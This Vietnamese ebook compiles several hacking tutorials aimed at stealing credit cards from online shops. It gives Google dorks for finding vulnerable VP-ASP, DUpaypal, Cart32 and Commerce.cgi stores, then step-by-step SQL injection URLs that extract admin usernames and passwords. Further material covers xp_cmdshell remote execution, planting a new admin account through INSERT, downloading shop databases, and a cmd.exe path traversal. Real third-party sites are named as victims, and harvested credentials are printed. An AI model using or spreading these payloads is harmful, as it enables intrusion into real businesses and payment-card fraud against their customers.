Ebook này được viết ra nhằm mục đích là
học hỏi và chia sẽ kiến thức.
Email: [email protected]
Homepage: http://cntt.pro.vn
Nội dung của ebook: hai tutorials do hieupc viết và một vài tutorials khác do
anh em bằng hữu viết, trong đó có một vài tutorials cũ nhưng cũng rất đáng
được đưa vào với mục đích để tham khảo.
Hacking Credit Card Version 2.0 --- Written by Hieupc
shopdisplayproducts.asp?
cat='
Sau một thời gian dài TTD bị chia cắt đến nay, hieupc mới bắt đầu viết 1 tutorial về hack credit card mới và có lẽ đây
là tutorial cuối cùng đầy đủ nhất,được hieupc biên soạn và sưu tầm từ nhiều tutorial cũ đến mới vào 1 cái ebook và trả
lời những câu hỏi thắc mắc của các bạn và hieupc cũng ðã làm 1 bản Ebook hacking credit card.
Nào giờ chúng ta bắt ðầu bắt ðầu nhé.
Cách này cũng nhý những cách thông thường là khai thác theo lỗi SQL và cũng có thể áp dụng cho 1 số lỗi khác như:
OLE DB, JET Database, ASP…
Býớc 1:
Khuyến cáo nên search shop ở www.google.com hoặc www.search.com vì mình thấy 2 site này rất very good.
Từ khoá nên dùng:
allinurl:”shopdisplayproducts.asp?id=
hoặc allinurl:”shopdisplayproducts.asp?cat=1 hoặc allinurl:”shopdisplayproducts.asp?cat=2……
Search shop theo Domain .com, .net , .biz…..:
allinurl:”.com/shopdisplayproducts.asp?cat=,allinurl:”.net/shopdisplayproducts.asp?cat=...
Ai biết chấm gì nữa thì thay vào :)
Khả năng lấy được credit card: là 99.9 % còn 0.1 % còn lại phụ thuộc vào cái đầu của bạn.
Xong phần search, bạn thu hoặch lại tất cả các shop bị lỗi và bắt ðầu hack.
Býớc 2:
Ví dụ: lấy ví dụ là 1 site thế có dạng thế này : http://www.victim.com
http://www.victim.com/shopdisplayproducts.asp?id=5
Ta sẽ thêm dấu phẩy ( ` ) vào sau số 5:
http://www.victim.com/shopdisplayproducts.asp?id=5'
20tbluser"having%201=1--sp_password
Cứ thế mà tiếp tục cho ðến khi bạn thấy 1 cái bảng đẹp đẹp hiện ra với vài con số.
Ở ðây là tới số 47 :
http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3,
fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,
fldpassword,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser"having
%201=1--sp_password
3
click to see more 4
22
18
Please review these other products:
Nào giờ chúng ta bắt đầu lấy user and pass:
·
fldusername : thay cho số 3 , hay 4, hay 22 tuỳ bạn
·
fldpassword : thay cho số 3 , hay 4, hay 22 tuỳ bạn
Sau khi thêm xong ta sẽ được nhý thế này:
http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3,
fldusername,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,
fldpassword,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser"having
%201=1--sp_password
Và có được username và password :
User: stephenrossi
pass: gnilsur
Hoặc bạn có thể gộp chung fldusername và fldpassword vào 1 số cũng được.
http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3,fldusername%2b'/'%
2bfldpassword,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,
40,41,42,43,44,45,46,47%20from%20tbluser"having%201=1--sp_password
Ta sẽ có user và pass được gộp chung 1 số:
'%20union%20%20select%201,2,3,
fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
,42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password
Sau khi thêm xong ta sẽ được thế này:
http://www.victim.com/shopdisplayproducts.asp?cat='%20union%20%20select%201,2,3,
fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41
,42,43,44,45,46,47%20from%20configuration"having%201=1--sp_password
Các bạn sẽ chẳng thấy link admin ở đâu hết toàn là mấy con số, lúc đầu hieupc cũng tưởng là mình làm sai cậu lệnh,
nhưng loay hoay 1 đỗi , kéo trang lên, kéo trang xuống, à thì ra có tới 10 trang.
Page 1 of 10
Chỉ cần để ý là các bạn thấy thôi, nói thêm là: mỗi một trang như vậy là chứa những thông tin có trong
fieldvalue
,
các bạn cứ cố gắng view từng trang nhé, hieupc view hết 10 trang và thu thập được những link có đuôi là *.asp:
shopaddmoretocart.asp
shopcheckout.asp
shopdisplaycategories.asp
Nhất định 1 trong 3 link này là link admin login , hieupc đã thử hết 3 link và cái link đầu tiên là link admin
shopaddmoretocart.asp
http://www.victim.com/shopaddmoretocart.asp
This site is reserved for Shop Administrators only.
Administrator's Login
UserName :
Password :
Bây giờ lấy username và password ở trên để thay vào. Việc còn lại chắc các bạn biết.
THE END
Image Field
Hacking Credit Card Version 1.0 --- Written by Hieupc
Hack Shop VPASP thật sự là như thế nào?
( Cập nhật và được phát triển thêm từ nhiều bài viết hướng dẫn trước đây )
%20union%20%20select%201%20from%20tbluser%27
Vào phía sau link shop nhớ bỏ luôn cái dấu phẩy sau ?id=1 nhé, nếu không là không được đâu đấy.
Khi thêm xong link sẽ như thế này:
http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201%20from%
20tbluser%27
Oh không dụ gì đây :)
Products
Microsoft OLE DB Provider for ODBC Drivers
error '80004005'
[Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not
match.
/chris/shop$db.asp, line 868
Còn không biết qua bước 3 nữa, nhưng khoan các bạn hãy xem kinh nghiệm của mình đă khi thêm vào dấu phẩy ( ` )
mà nó hiện ra lỗi như vầy:
Microsoft OLE DB Provider for SQL Server
error '80040e14'
Unclosed quotation mark before the character string ' '.
/product.asp, line 29
Thì các bạn hack theo kiểu hack cũ nhé.
Thui bây giờ qua bước 3 nhé, nói nhiều quá :))
Sau khi đă hoàn thành bước 2, bạn sẽ bắt đầu 1 công việc thiêng liêng nhất và cũng là mệt mỏi nhất, không mệt đâu
chỉ uể oải 1 tí, đó là thêm số vào code:
1%20union%20%20select%201,2%20from%20tbluser%27
1%20union%20%20select%201,2,3%20from%20tbluser%27
1%20union%20%20select%201,2,3,4%20from%20tbluser%27………..
Khi thêm vào thì link sẽ như thế này :
http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201,2%20from%
20tbluser%27
Microsoft OLE DB Provider for ODBC Drivers
error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''.
/shopping/shopdisplayproducts.asp, line 93
Oh có lỗi rồi, giờ sao đây :))
Cái này anh em biết khai thác chứ:
http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top%
201%20table_name%20from%20information_schema.tables))--sp_password
Microsoft OLE DB Provider for ODBC Drivers
error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'ver_Faq' to a column of data type
int.
/shopping/shopdisplayproducts.asp, line 93
B
ước 2 chắc các bạn biết, chỉ là lấy table thui, mình chỉ việc kiếm table nào chưá users của admin là okie.
http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top%
201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20
('ver_Faq','coupons','customerprices','customers')))--sp_password
Products
Microsoft OLE DB Provider for ODBC Drivers
error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'AdminUsers' to a column of data
type int.
/shopping/shopdisplayproducts.asp, line 93
Tới đây là đã quá rõ, cái mình chính là table này : 'AdminUsers' vì sao vậy vì nó chưá user và pass chắc. Thui cứ khai
thác thử.
Code: %20and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%
20where%20table_name=('AdminUsers')))--sp_password
Khi thêm code xong sẽ như thế này:
http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top%
http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(int,(select%20top%
201%20login%2b'/'%2bpwd%20from%20AdminUsers))--sp_password
Products
Microsoft OLE DB Provider for ODBC Drivers
error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin/admin' to a column of data
type int.
/shopping/shopdisplayproducts.asp, line 93
Hic hic, user: admin , pass: admin ; đủ biết là shop này thằng admin nó ngu đến cỡ nào
Bây giờ kiếm link admin là nhiệm vụ của bạn.
TUTORIALS OF MY FRIENDS OR ORTHER AUTHORS
Tutorial ñöôïc vieát bôûi kidbandes
What you should look for? (Mục đích của việc tìm lỗi)
Tìm ra các trang cho phép bạn nhạp dữ liệu, ví dụ là login page, search page, .... Thỉnh thoảng, HTML page sử dụng
"Post" command để gởi thông số đến trang ASP khác. Vì vậy, bạn không thể thấy thông số trên thanh URL, và xem
"FORM" tag trong HTML code. Bạn có thể tìm vài thứ như đoạn code sau:
<FORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</FORM>
Mọi thứ giữa <FORM> và </FORM> có thông số lỗi được sử dụng.
What if you can't find any page that takes input? Bạn làm gì nếu không tìm ðýợc trang nhập liệu nào ?
Bạn nên tìm kiếm trang nhý ASP, JSP, CGI, hay PHP. Cố gắng tìm các URL vói các thông số sau:
http://shopping.com/index.asp?id=10
How do you test if it is vulnerable? (Chúng ta kiểm tra lỗi như thế nào)
Bắt đầu với 1 dấu nháy đơn, thêm vào như sau: hi' or 1=1--
Nhập vào login hoặc password, hoặc ngay cả URL.
- login: hi' or 1=1--
- password: hi' or 1=1--
- http://shopping.com/index.asp?id=hi' or 1=1--
Nếu bạn làm như thế với 1 giá trị ẩn, phải download source HTML từ site, lưu vào đĩa cứng và chỉnh sửa URL và giá
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
How do I get remote execution with SQL injection? (Phương pháp để thực thi lệnh từ xa với SQL)
Để có thể inject(nhập thêm) 1 lệnh SQL, chúng ta có thể thực hiện lệnh. Cài đặt mặc ðịnh trên MS SQL chạy dưới
quyền SYSTEM, là user với quyền truy cập Aministrator. Chúng ta có thể sử dụng để lưu trữ master..xp_cmdshell thực
hiện lệnh từ xa:
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
Thử dấu (") nếu dấu (') không làm việc.
Hai dấu trừ ở cuối dòng lệnh cho phép thực hiện một lệnh SQL mới. Ðể kiểm tra rằng câu lệnh này thực hiện được,
bạn có thể lắng nghe các gói tin ICMP từ 10.10.1.2, kiểm tra bất kỳ gói tin nào từ server:
#tcpdump icmp
Nếu bạn không nhận ðýợc bất kỳ gói tin từ server, và nhận 1 thông báo lỗi là không ðýợc quyền, thì có thể
Administrator đã giới hạn quyền người dùng truy cập vào hệ thống.
How to get output of my SQL query?(Phýõng pháp Lấy kết quả từ câu truy vẫn SQL)
Nếu có thể, bạn sử dụng sp_makewebtask để viết câu truy vấn thành câu lệnh HTML:
'; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.
TABLES"
Nhưng địa chỉ IP phải có thư mục được share cho tất cả mọi người
How to get data from the database using ODBC error message (Phương pháp Lấy dữ liệu từ CSDL sử dụng lỗi ODBC)
Chúng ta sử dụng thủ tục bị lỗi trong Server MS SQL để thực hiện lệnh. Xem ví dụ sau:
http://shopping.com/index.asp?id=10
Chúng ta cố gắng kết hợp UNION trong '10' với 1 câu lệnh khác:
http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.
TABLES--
Bảng hệ thống INFORMATION_SCHEMA.TABLES chứa thông tin của tất cả các bảng trong hệ thống.
TABLE_NAME field chứa tất cả các tên của bảng trong hệ thống. Nó luôn luôn tồn tại theo cách mặc định. Câu truy
vấn sẽ là:
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
/index.asp, line 5
Bây giờ chúng ta có cột đầu tiên trong table, chúng ta sử dụng NOT IN () để lấy cột tiếp theo:
http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT
IN ('login_id')--
Output:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a
column of data type int.
/index.asp, line 5
Khi chúng ta tiếp tục có thể sẽ thu được một số cột cần thiết như là "password", "details". Chúng ta sẽ biết được nội
dung khi sử dụng câu truy vấn sau:
Quote:
http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT
IN ('login_id','login_name','password',details')--
Output:
Quote:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement
contains a UNION operator.
/index.asp, line 5
How to retrieve any data we want? (phương pháp lấy tất cả dữ liệu mình muốn)
Bây giờ chúng ta sẽ xem xét 1 số table quan trọng, và các field của nó, Chúng ta cũng sử dụng cùng kỹ thuật trên ðể
lấy dữ liệu cần thiết trong CSDL .
Bây giờ chúng ta lấy giá trị đầu tiên trong cột login_name từ bảng "admin_login":
http://shopping.com/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'kidbandes' to a
column of data type int.
/index.asp, line 5
How to update/insert data into the database? (phương pháp Update/Insert dữ liệu vào CSDL)
Khi chúng ta thành công trong việc thu thập thông tin từ CSDL, ðiều này có nghĩa chúng ta có thể UPDATE hoặc ngay
cả INSERT một record mới trong table. Ví dụ chúng ta có thể thay password của "kidbandes":
http://shopping.com/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'lovethu' WHERE
login_name='kidbandes'--
Để INSERT dữ liệu mới vào CSDL:
http://shopping.com/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details')
VALUES (666,'kidbandes2','lovethu','NA')--
Bây giờ chúng ta có thể đăng nhập với "kidbandes2" và password "lovethu".
date : 29/05/2005 TG kidbandes newbie of Thecorrs Family
TUTORIAL FORM jonnyhackstuff
Mức độ nguy hiểm : khá cao
tỷ lệ thành công :80%
Tool :+ site http://google.com.vn/
+ PC của bạn cài Access ( dùng để xem file .mdb)
Hiện các Shop DUpaypal rất nhiều và hàu như chưa fix được mấy bằng chứng là tấn công 10 site thì 8 site dính :D)
Tiến hành:
Lên http://google.com.vn/ Search với từ khóa "Powered by DUpaypal -siteduware.com"
bạn sẻ thấy rất nhiều site dính Bug này, Chọn victim để test nào
ở đây kieptinhchung chọn cái này:
http://www.xcel-leadership.com/sermon/deta...ro=147&iType=18
bi giờ thêm vào sau Nó :
../_private/DUpaypal.mdb
để Dowload file chứa thông tin về U/P của Admin về , tức là ta sẻ dùng link sau để dowload nó:
http://www.xcel-leadership.com/sermon/_private/DUpaypal.mdb
sau khi dowload về bạn sẻ xem Nó dưới dạng Accees, tìm phần User và lấy user+pass đăng nhập
thật dễ dàng , như vậy là bạn đã làm chủ Shop đó roài đó.
TUTORIAL BY HCEGROUP
\progra~1\MWAInc\Cart32\
-Bạn sẽ thấy những dòng giống như sau :
2814659000-001001.c32
2814659000-001002.c32
2814659000-001003.c32
-Bây giờ tất những gì cần phải làm là bạn thêm 1 trong ba hoặc thử thì dùng từng cái vào cuối địa chỉ trên. Sau cùng ta
sẽ có giống như thế này :
http://www.connectionsmall.com/scripts/..À¯..À¯..À¯..À¯../winnt/system32/cmd.exe?/c+dir+c:\progra~1\MWAInc
\Cart32\2814659000-001001.c32
============================
III-Lỗi Commerce.cgi
Cách thức tìm : Dùng Google
Câu tìm kiếm : Commerce.cgi
Kết quả : Chạy các trang web có tập tin Commerce.cgi. Giả sử bạn kiếm được trang web sau có lỗi
http://www.warresisters.org/store/commerce.cgi
Bạn thay từ commerce.cgi bằng admin_files/commerce_user_lib.pl
Ví dụ :
http://www.warresisters.org/store/admin_files/commerce_user_lib.pl
Bạn sẽ nhận được 1 số thông tin :
$sc_sales_tax = ".0825";
$sc_sales_tax_state = "NY";
$sc_send_order_to_email = "yes";
$sc_order_log_name = "onlinebookstore.log";
$sc_send_order_to_log = "yes";
$shipping_percentage = ".15";
$sc_order_email = "wrl\@igc.org";
$sc_root_url = "http://www.warresisters.org/store";
$sc_admin_email = "lit\@warresisters.org";
$sc_domain_name_for_cookie = ".warresisters.org";
$sc_order_script_url = "https://secure.serve.com/resist/store/commerce.cgi";
Tên và mật khẩu : Không cần
Sau đó : Bãn tải được kho dữ liệu có credit card
TUTORIAL BY CVHINT
-Lâu rồi không ghé qua diễn đàn chơi sợ anh em nhớNên tui xin góp một bài viết gọi là đóng góp cho diễn đàn tí xíu
với lại về việc hack tôi sẽ không tham gia một thời gian dài nên việc share hết kinh nghiệm háck shop cho anh em chỉ
còn là vấn đề thời gian vì vậy ai khoái cái dụ cc thì nên chú ý bài viết này của tôi nhé.
Bây giờ chúng ta sẽ đi vào vấn đề chính của bài viết này.Tôi biết hack shop thì ai cũng biết nhưng hack thế nào để có
cc thì rất nhiều người không biết hoặc nếu có thì chưa kịp ăn đã die vì lí do cách hack đó ai cũng biết ( Nếu tôi đoán
không lầm thì bài viết của Hiếupc ai cũng đọc qua rồi nhỉ ).Thế nên tôi sẽ chỉ cho các bạn một cách hack dạng sql mới
chưa phổ biến lắm và ít người hack được.
Nhưng xin mọi người cho tui nói vài lời.Tôi đã từng lướt qua các site của viethacker và vào trong box thảo luận về sql
xem thế nào thì có nhiều người cho ý kiến thế này "SQL là một lỗi đã bị lỗi thời".Trùi nghe mà buồi rười rượi.
Nói cho các bạn nghe SQL không hề lỗi thời chủ yếu là có biến cái lỗi thời thành lỗi phổ biến của riêng mình hay
không lại là chuyện khác.
Thôi nói nhiều mệt quá nên viết bài đây :
Vào google search từ khoá nào mà các bạn biết nhé.Tôi xin đóng góp một vài từ khoá bạn nào biết cái nào thì share
cho mọi người nhé.:
shopcategories.asp?id= /shop/ shopping product.asp?ProductID
allinurl:"shopdisplayproducts.asp?id=
allinurl:"shopdisplayproducts.asp?id=1
allinurl:"shopdisplayproducts.asp?id=2
allinurl:".com/shopdisplayproducts.asp?id=
allinurl:".net/shopdisplayproducts.asp?id=
.asp?=catalogid=
.asp?cid=
alliurl: shop$.asp?$=
shopexd.asp?
shopreviewlist.asp?id=1
shopreviewadd.asp?id=
rồi search đại một shop giả sử như thế này : www.cvhint.com/shopdisplayproducts.áp?id=1
shop ngon mà ăn dài dài thôi.Đây là một dạng nâng cao hơi nguy hiểm nên tui không thể đưa ra vd cho các bạn được
nếu ai có search thấy một site nào đó thì hãy post lên cho mọi người cùng hack.Bye
Bản quyền : cvhint và một người bạn.
Copyright: Tài liệu đại học ©